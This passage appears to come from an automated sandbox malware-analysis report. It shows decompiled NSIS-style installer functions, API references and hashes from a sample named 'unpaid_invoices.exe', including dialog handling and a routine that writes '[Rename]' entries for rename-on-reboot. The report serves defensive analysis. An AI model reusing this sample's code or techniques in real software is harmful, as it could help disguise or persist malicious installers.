              							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
              						}
              						_t66 =  *((intOrPtr*)(_t107 + 8));
              						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
              						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
              						if( *_t91 != _t83) {
              							_t76 =  *((intOrPtr*)(_t107 + 8));
              							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
              						}
              						_t68 =  *((intOrPtr*)(_t107 + 8));
              						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
              						_t70 =  *((intOrPtr*)(_t107 + 8));
              						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
              						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
              							_t74 =  *((intOrPtr*)(_t107 - 0x38));
              							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
              						}
              						_t72 =  *((intOrPtr*)(_t107 - 0x38));
              						 *((intOrPtr*)( *_t72 + 8))(_t72);
              					}
              					_t62 =  *((intOrPtr*)(_t107 + 8));
              					 *((intOrPtr*)( *_t62 + 8))(_t62);
              					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
              						_push(0xfffffff4);
              					} else {
              						goto L14;
              					}
              				}
              				E00401423();
              				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t107 - 4));
              				return 0;
              			}

              APIs
              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
              Strings
              • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CreateInstance
              • String ID: C:\Users\user\AppData\Local\Temp
              • API String ID: 542301482-47812868
              • Opcode ID: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
              • Instruction ID: c9e7058f2ccac2017f9d88f2873359e197591af4de9cbf84fabb751e216ccc72
              • Opcode Fuzzy Hash: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
              • Instruction Fuzzy Hash: A1411571A00209EFCF40DFE4C989E9D7BB5BF49304B2045AAF505EB2D1DB799981CB94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 39%
              			E0040290B(short __ebx, short* __edi) {
              				void* _t21;
              
              				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
              					E004065B5( *((intOrPtr*)(_t21 - 0xc)), _t8);
              					_push(_t21 - 0x2b0);
              					_push(__edi);
              					E0040666E();
              				} else {
              					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
              					 *__edi = __ebx;
              					 *((intOrPtr*)(_t21 - 4)) = 1;
              				}
              				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t21 - 4));
              				return 0;
              			}





              APIs
              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: FileFindFirst
              • String ID:
              • API String ID: 1974802433-0
              • Opcode ID: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
              • Instruction ID: 9ced82c77f1422a0303d0e50afa4302c42ae01a582b6fde34da312f05d76664a
              • Opcode Fuzzy Hash: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
              • Instruction Fuzzy Hash: 5CF05E71904104EAD701DBA4E949AAEB378EF15314F20457BE101F21D0EBB88E119B29
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 96%
              			E00405037(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
              				struct HWND__* _v8;
              				struct HWND__* _v12;
              				long _v16;
              				signed int _v20;
              				signed int _v24;
              				intOrPtr _v28;
              				signed char* _v32;
              				int _v36;
              				signed int _v44;
              				int _v48;
              				signed int* _v60;
              				signed char* _v64;
              				signed int _v68;
              				long _v72;
              				void* _v76;
              				intOrPtr _v80;
              				intOrPtr _v84;
              				void* _v88;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t198;
              				intOrPtr _t201;
              				long _t207;
              				signed int _t211;
              				signed int _t222;
              				void* _t225;
              				void* _t226;
              				int _t232;
              				long _t237;
              				long _t238;
              				signed int _t239;
              				signed int _t245;
              				signed int _t247;
              				signed char _t248;
              				signed char _t254;
              				void* _t258;
              				void* _t260;
              				signed char* _t278;
              				signed char _t279;
              				long _t284;
              				struct HWND__* _t291;
              				signed int* _t292;
              				int _t293;
              				long _t294;
              				signed int _t295;
              				void* _t297;
              				long _t298;
              				int _t299;
              				signed int _t300;
              				signed int _t303;
              				signed int _t311;
              				signed char* _t319;
              				int _t324;
              				void* _t326;
              
              				_t291 = _a4;
              				_v12 = GetDlgItem(_t291, 0x3f9);
              				_v8 = GetDlgItem(_t291, 0x408);
              				_t326 = SendMessageW;
              				_v24 =  *0x7a8ac8;
              				_v28 =  *0x7a8ab0 + 0x94;
              				if(_a8 != 0x110) {
              					L23:
              					if(_a8 != 0x405) {
              						_t301 = _a16;
              					} else {
              						_a12 = 0;
              						_t301 = 1;
              						_a8 = 0x40f;
              						_a16 = 1;
              					}
              					if(_a8 == 0x4e || _a8 == 0x413) {
              						_v16 = _t301;
              						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
              							if(( *0x7a8ab9 & 0x00000002) != 0) {
              								L41:
              								if(_v16 != 0) {
              									_t237 = _v16;
              									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
              										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
              									}
              									_t238 = _v16;
              									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
              										_t301 = _v24;
              										_t239 =  *(_t238 + 0x5c);
              										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
              											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
              										} else {
              											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
              										}
              									}
              								}
              								goto L48;
              							}
              							if(_a8 == 0x413) {
              								L33:
              								_t301 = 0 | _a8 != 0x00000413;
              								_t245 = E00404F85(_v8, _a8 != 0x413);
              								_t295 = _t245;
              								if(_t295 >= 0) {
              									_t94 = _v24 + 8; // 0x8
              									_t301 = _t245 * 0x818 + _t94;
              									_t247 =  *_t301;
              									if((_t247 & 0x00000010) == 0) {
              										if((_t247 & 0x00000040) == 0) {
              											_t248 = _t247 ^ 0x00000001;
              										} else {
              											_t254 = _t247 ^ 0x00000080;
              											if(_t254 >= 0) {
              												_t248 = _t254 & 0x000000fe;
              											} else {
              												_t248 = _t254 | 0x00000001;
              											}
              										}
              										 *_t301 = _t248;
              										E0040117D(_t295);
              										_a12 = _t295 + 1;
              										_a16 =  !( *0x7a8ab8) >> 0x00000008 & 0x00000001;
              										_a8 = 0x40f;
              									}
              								}
              								goto L41;
              							}
              							_t301 = _a16;
              							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
              								goto L41;
              							}
              							goto L33;
              						} else {
              							goto L48;
              						}
              					} else {
              						L48:
              						if(_a8 != 0x111) {
              							L56:
              							if(_a8 == 0x200) {
              								SendMessageW(_v8, 0x200, 0, 0);
              							}
              							if(_a8 == 0x40b) {
              								_t225 =  *0x7a1f6c;
              								if(_t225 != 0) {
              									ImageList_Destroy(_t225);
              								}
              								_t226 =  *0x7a1f80;
              								if(_t226 != 0) {
              									GlobalFree(_t226);
              								}
              								 *0x7a1f6c = 0;
              								 *0x7a1f80 = 0;
              								 *0x7a8b00 = 0;
              							}
              							if(_a8 != 0x40f) {
              								L90:
              								if(_a8 == 0x420 && ( *0x7a8ab9 & 0x00000001) != 0) {
              									_t324 = (0 | _a16 == 0x00000020) << 3;
              									ShowWindow(_v8, _t324);
              									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
              								}
              								goto L93;
              							} else {
              								E004011EF(_t301, 0, 0);
              								_t198 = _a12;
              								if(_t198 != 0) {
              									if(_t198 != 0xffffffff) {
              										_t198 = _t198 - 1;
              									}
              									_push(_t198);
              									_push(8);
              									E00405005();
              								}
              								if(_a16 == 0) {
              									L75:
              									E004011EF(_t301, 0, 0);
              									_v36 =  *0x7a1f80;
              									_t201 =  *0x7a8ac8;
              									_v64 = 0xf030;
              									_v24 = 0;
              									if( *0x7a8acc <= 0) {
              										L86:
              										if( *0x7a8b5e == 0x400) {
              											InvalidateRect(_v8, 0, 1);
              										}
              										if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != 0) {
              											E00404F40(0x3ff, 0xfffffffb, E00404F58(5));
              										}
              										goto L90;
              									}
              									_t292 = _t201 + 8;
              									do {
              										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
              										if(_t207 != 0) {
              											_t303 =  *_t292;
              											_v72 = _t207;
              											_v76 = 8;
              											if((_t303 & 0x00000001) != 0) {
              												_v76 = 9;
              												_v60 =  &(_t292[4]);
              												_t292[0] = _t292[0] & 0x000000fe;
              											}
              											if((_t303 & 0x00000040) == 0) {
              												_t211 = (_t303 & 0x00000001) + 1;
              												if((_t303 & 0x00000010) != 0) {
              													_t211 = _t211 + 3;
              												}
              											} else {
              												_t211 = 3;
              											}
              											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
              											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
              											SendMessageW(_v8, 0x113f, 0,  &_v76);
              										}
              										_v24 = _v24 + 1;
              										_t292 =  &(_t292[0x206]);
              									} while (_v24 <  *0x7a8acc);
              									goto L86;
              								} else {
              									_t293 = E004012E2( *0x7a1f80);
              									E00401299(_t293);
              									_t222 = 0;
              									_t301 = 0;
              									if(_t293 <= 0) {
              										L74:
              										SendMessageW(_v12, 0x14e, _t301, 0);
              										_a16 = _t293;
              										_a8 = 0x420;
              										goto L75;
              									} else {
              										goto L71;
              									}
              									do {
              										L71:
              										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
              											_t301 = _t301 + 1;
              										}
              										_t222 = _t222 + 1;
              									} while (_t222 < _t293);
              									goto L74;
              								}
              							}
              						}
              						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
              							goto L93;
              						} else {
              							_t232 = SendMessageW(_v12, 0x147, 0, 0);
              							if(_t232 == 0xffffffff) {
              								goto L93;
              							}
              							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
              							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
              								_t294 = 0x20;
              							}
              							E00401299(_t294);
              							SendMessageW(_a4, 0x420, 0, _t294);
              							_a12 = _a12 | 0xffffffff;
              							_a16 = 0;
              							_a8 = 0x40f;
              							goto L56;
              						}
              					}
              				} else {
              					_v36 = 0;
              					_v20 = 2;
              					 *0x7a8b00 = _t291;
              					 *0x7a1f80 = GlobalAlloc(0x40,  *0x7a8acc << 2);
              					_t258 = LoadImageW( *0x7a8aa0, 0x6e, 0, 0, 0, 0);
              					 *0x7a1f74 =  *0x7a1f74 | 0xffffffff;
              					_t297 = _t258;
              					 *0x7a1f7c = SetWindowLongW(_v8, 0xfffffffc, E00405644);
              					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
              					 *0x7a1f6c = _t260;
              					ImageList_AddMasked(_t260, _t297, 0xff00ff);
              					SendMessageW(_v8, 0x1109, 2,  *0x7a1f6c);
              					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
              						SendMessageW(_v8, 0x111b, 0x10, 0);
              					}
              					DeleteObject(_t297);
              					_t298 = 0;
              					do {
              						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
              						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
              							if(_t298 != 0x20) {
              								_v20 = 0;
              							}
              							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066AB(_t298, 0, _t326, 0, _t266)), _t298);
              						}
              						_t298 = _t298 + 1;
              					} while (_t298 < 0x21);
              					_t299 = _a16;
              					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
              					_push(0x15);
              					E004045CA(_a4);
              					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
              					_push(0x16);
              					E004045CA(_a4);
              					_t300 = 0;
              					_v16 = 0;
              					if( *0x7a8acc <= 0) {
              						L19:
              						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
              						goto L20;
              					} else {
              						_t319 = _v24 + 8;
              						_v32 = _t319;
              						do {
              							_t278 =  &(_t319[0x10]);
              							if( *_t278 != 0) {
              								_v64 = _t278;
              								_t279 =  *_t319;
              								_v88 = _v16;
              								_t311 = 0x20;
              								_v84 = 0xffff0002;
              								_v80 = 0xd;
              								_v68 = _t311;
              								_v44 = _t300;
              								_v72 = _t279 & _t311;
              								if((_t279 & 0x00000002) == 0) {
              									if((_t279 & 0x00000004) == 0) {
              										 *( *0x7a1f80 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
              									} else {
              										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
              									}
              								} else {
              									_v80 = 0x4d;
              									_v48 = 1;
              									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
              									_v36 = 1;
              									 *( *0x7a1f80 + _t300 * 4) = _t284;
              									_v16 =  *( *0x7a1f80 + _t300 * 4);
              								}
              							}
              							_t300 = _t300 + 1;
              							_t319 =  &(_v32[0x818]);
              							_v32 = _t319;
              						} while (_t300 <  *0x7a8acc);
              						if(_v36 != 0) {
              							L20:
              							if(_v20 != 0) {
              								E004045FF(_v8);
              								goto L23;
              							} else {
              								ShowWindow(_v12, 5);
              								E004045FF(_v12);
              								L93:
              								return E00404631(_a8, _a12, _a16);
              							}
              						}
              						goto L19;
              					}
              				}
              			}



























































              APIs
              • GetDlgItem.USER32 ref: 0040504F
              • GetDlgItem.USER32 ref: 0040505A
              • GlobalAlloc.KERNEL32(00000040,?), ref: 004050A4
              • LoadImageW.USER32 ref: 004050BB
              • SetWindowLongW.USER32(?,000000FC,00405644), ref: 004050D4
              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E8
              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050FA
              • SendMessageW.USER32(?,00001109,00000002), ref: 00405110
              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 0040511C
              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040512E
              • DeleteObject.GDI32(00000000), ref: 00405131
              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040515C
              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405168
              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405203
              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405233
                • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405247
              • GetWindowLongW.USER32(?,000000F0), ref: 00405275
              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405283
              • ShowWindow.USER32(?,00000005), ref: 00405293
              • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040538E
              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053F3
              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405408
              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040542C
              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040544C
              • ImageList_Destroy.COMCTL32(?), ref: 00405461
              • GlobalFree.KERNEL32 ref: 00405471
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054EA
              • SendMessageW.USER32(?,00001102,?,?), ref: 00405593
              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055A2
              • InvalidateRect.USER32(?,00000000,00000001), ref: 004055CD
              • ShowWindow.USER32(?,00000000), ref: 0040561B
              • GetDlgItem.USER32 ref: 00405626
              • ShowWindow.USER32(00000000), ref: 0040562D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
              • String ID: $M$N
              • API String ID: 2564846305-813528018
              • Opcode ID: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
              • Instruction ID: 1c888212402988323542b136e78769e30209d338b2ecbb40b03ff66d659fa363
              • Opcode Fuzzy Hash: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
              • Instruction Fuzzy Hash: 25027A70900609EFDB20DFA5CD85AAF7BB5FB85314F10812AF611BA2E1DB798951CF18
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 91%
              			E00404789(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
              				char _v8;
              				int _v12;
              				void* _v16;
              				struct HWND__* _t56;
              				signed int _t75;
              				signed short* _t76;
              				signed short* _t78;
              				long _t92;
              				int _t103;
              				signed int _t110;
              				intOrPtr _t113;
              				WCHAR* _t114;
              				signed int* _t116;
              				WCHAR* _t117;
              				struct HWND__* _t118;
              
              				if(_a8 != 0x110) {
              					if(_a8 != 0x111) {
              						L13:
              						if(_a8 != 0x4e) {
              							if(_a8 == 0x40b) {
              								 *0x79ff54 =  *0x79ff54 + 1;
              							}
              							L27:
              							_t114 = _a16;
              							L28:
              							return E00404631(_a8, _a12, _t114);
              						}
              						_t56 = GetDlgItem(_a4, 0x3e8);
              						_t114 = _a16;
              						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
              							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
              							_t113 =  *((intOrPtr*)(_t114 + 0x18));
              							_v12 = _t103;
              							_v16 = _t113;
              							_v8 = 0x7a6a40;
              							if(_t103 - _t113 < 0x800) {
              								SendMessageW(_t56, 0x44b, 0,  &_v16);
              								SetCursor(LoadCursorW(0, 0x7f02));
              								_push(1);
              								_t44 =  &_v8; // 0x7a6a40
              								E00404A38(_a4,  *_t44);
              								SetCursor(LoadCursorW(0, 0x7f00));
              								_t114 = _a16;
              							}
              						}
              						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
              							goto L28;
              						} else {
              							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
              								SendMessageW( *0x7a8aa8, 0x111, 1, 0);
              							}
              							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
              								SendMessageW( *0x7a8aa8, 0x10, 0, 0);
              							}
              							return 1;
              						}
              					}
              					if(_a12 >> 0x10 != 0 ||  *0x79ff54 != 0) {
              						goto L27;
              					} else {
              						_t116 =  *0x7a0f60 + 0x14;
              						if(( *_t116 & 0x00000020) == 0) {
              							goto L27;
              						}
              						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
              						E004045EC(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
              						E00404A14();
              						goto L13;
              					}
              				}
              				_t117 = _a16;
              				_t75 =  *(_t117 + 0x30);
              				if(_t75 < 0) {
              					_t75 =  *( *0x7a7a7c - 4 + _t75 * 4);
              				}
              				_t76 =  *0x7a8ad8 + _t75 * 2;
              				_t110 =  *_t76 & 0x0000ffff;
              				_a8 = _t110;
              				_t78 =  &(_t76[1]);
              				_a16 = _t78;
              				_v16 = _t78;
              				_v12 = 0;
              				_v8 = E0040473A;
              				if(_t110 != 2) {
              					_v8 = E00404700;
              				}
              				_push( *((intOrPtr*)(_t117 + 0x34)));
              				_push(0x22);
              				E004045CA(_a4);
              				_push( *((intOrPtr*)(_t117 + 0x38)));
              				_push(0x23);
              				E004045CA(_a4);
              				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
              				E004045EC( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
              				_t118 = GetDlgItem(_a4, 0x3e8);
              				E004045FF(_t118);
              				SendMessageW(_t118, 0x45b, 1, 0);
              				_t92 =  *( *0x7a8ab0 + 0x68);
              				if(_t92 < 0) {
              					_t92 = GetSysColor( ~_t92);
              				}
              				SendMessageW(_t118, 0x443, 0, _t92);
              				SendMessageW(_t118, 0x445, 0, 0x4010000);
              				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
              				 *0x79ff54 = 0;
              				SendMessageW(_t118, 0x449, _a8,  &_v16);
              				 *0x79ff54 = 0;
              				return 0;
              			}



















              APIs
              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404827
              • GetDlgItem.USER32 ref: 0040483B
              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404858
              • GetSysColor.USER32(?), ref: 00404869
              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404877
              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404885
              • lstrlenW.KERNEL32(?), ref: 0040488A
              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404897
              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048AC
              • GetDlgItem.USER32 ref: 00404905
              • SendMessageW.USER32(00000000), ref: 0040490C
              • GetDlgItem.USER32 ref: 00404937
              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040497A
              • LoadCursorW.USER32(00000000,00007F02), ref: 00404988
              • SetCursor.USER32(00000000), ref: 0040498B
              • LoadCursorW.USER32(00000000,00007F00), ref: 004049A4
              • SetCursor.USER32(00000000), ref: 004049A7
              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D6
              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
              • String ID: @jz$N
              • API String ID: 3103080414-4087404676
              • Opcode ID: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
              • Instruction ID: a92c684f90d09e790cb96c84d129e3e4002e0b0c6609d0ca9bf02dd30757374c
              • Opcode Fuzzy Hash: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
              • Instruction Fuzzy Hash: D861A2B1900209BFDB109F61DD85AAA7BA9FB85315F00803AF705B62E1C77C9D51DF98
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004062B4(void* __ecx) {
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				long _t12;
              				long _t24;
              				char* _t31;
              				int _t37;
              				void* _t38;
              				intOrPtr* _t39;
              				long _t42;
              				WCHAR* _t44;
              				void* _t46;
              				void* _t48;
              				void* _t49;
              				void* _t52;
              				void* _t53;
              
              				_t38 = __ecx;
              				_t44 =  *(_t52 + 0x14);
              				 *0x7a5628 = 0x55004e;
              				 *0x7a562c = 0x4c;
              				if(_t44 == 0) {
              					L3:
              					_t2 = _t52 + 0x1c; // 0x7a5e28
              					_t12 = GetShortPathNameW( *_t2, 0x7a5e28, 0x400);
              					if(_t12 != 0 && _t12 <= 0x400) {
              						_t37 = wsprintfA(0x7a5228, "%ls=%ls\r\n", 0x7a5628, 0x7a5e28);
              						_t53 = _t52 + 0x10;
              						E004066AB(_t37, 0x400, 0x7a5e28, 0x7a5e28,  *((intOrPtr*)( *0x7a8ab0 + 0x128)));
              						_t12 = E0040615E(0x7a5e28, 0xc0000000, 4);
              						_t48 = _t12;
              						 *(_t53 + 0x18) = _t48;
              						if(_t48 != 0xffffffff) {
              							_t42 = GetFileSize(_t48, 0);
              							_t6 = _t37 + 0xa; // 0xa
              							_t46 = GlobalAlloc(0x40, _t42 + _t6);
              							if(_t46 == 0 || E004061E1(_t48, _t46, _t42) == 0) {
              								L18:
              								return CloseHandle(_t48);
              							} else {
              								if(E004060C3(_t38, _t46, "[Rename]\r\n") != 0) {
              									_t49 = E004060C3(_t38, _t21 + 0xa, "\n[");
              									if(_t49 == 0) {
              										_t48 =  *(_t53 + 0x18);
              										L16:
              										_t24 = _t42;
              										L17:
              										E00406119(_t24 + _t46, 0x7a5228, _t37);
              										SetFilePointer(_t48, 0, 0, 0);
              										E00406210(_t48, _t46, _t42 + _t37);
              										GlobalFree(_t46);
              										goto L18;
              									}
              									_t39 = _t46 + _t42;
              									_t31 = _t39 + _t37;
              									while(_t39 > _t49) {
              										 *_t31 =  *_t39;
              										_t31 = _t31 - 1;
              										_t39 = _t39 - 1;
              									}
              									_t24 = _t49 - _t46 + 1;
              									_t48 =  *(_t53 + 0x18);
              									goto L17;
              								}
              								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
              								_t42 = _t42 + 0xa;
              								goto L16;
              							}
              						}
              					}
              				} else {
              					CloseHandle(E0040615E(_t44, 0, 1));
              					_t12 = GetShortPathNameW(_t44, 0x7a5628, 0x400);
              					if(_t12 != 0 && _t12 <= 0x400) {
              						goto L3;
              					}
              				}
              				return _t12;
              			}




















              APIs
              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040644F,?,?), ref: 004062EF
              • GetShortPathNameW.KERNEL32 ref: 004062F8
                • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
                • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
              • GetShortPathNameW.KERNEL32 ref: 00406315
              • wsprintfA.USER32 ref: 00406333
              • GetFileSize.KERNEL32(00000000,00000000,007A5E28,C0000000,00000004,007A5E28,?,?,?,?,?), ref: 0040636E
              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040637D
              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063B5
              • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,007A5228,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040640B
              • GlobalFree.KERNEL32 ref: 0040641C
              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406423
                • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\unpaid_invoices.exe,80000000,00000003), ref: 00406162
                • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
              • String ID: %ls=%ls$(Vz$(^z$(^z$[Rename]
              • API String ID: 2171350718-2000197835
              • Opcode ID: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
              • Instruction ID: 6cadb61bc7003589c9facc341004653e1fa6c0793f9c109ef5d6a16b2289e69d
              • Opcode Fuzzy Hash: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
              • Instruction Fuzzy Hash: 2D313571600705BBD2206B669D48F1B3A9CEF85714F16003EFD42FA2C2DA7DD82586BD
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 90%
              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
              				struct tagLOGBRUSH _v16;
              				struct tagRECT _v32;
              				struct tagPAINTSTRUCT _v96;
              				struct HDC__* _t70;
              				struct HBRUSH__* _t87;
              				struct HFONT__* _t94;
              				long _t102;
              				signed int _t126;
              				struct HDC__* _t128;
              				intOrPtr _t130;
              
              				if(_a8 == 0xf) {
              					_t130 =  *0x7a8ab0;
              					_t70 = BeginPaint(_a4,  &_v96);
              					_v16.lbStyle = _v16.lbStyle & 0x00000000;
              					_a8 = _t70;
              					GetClientRect(_a4,  &_v32);
              					_t126 = _v32.bottom;
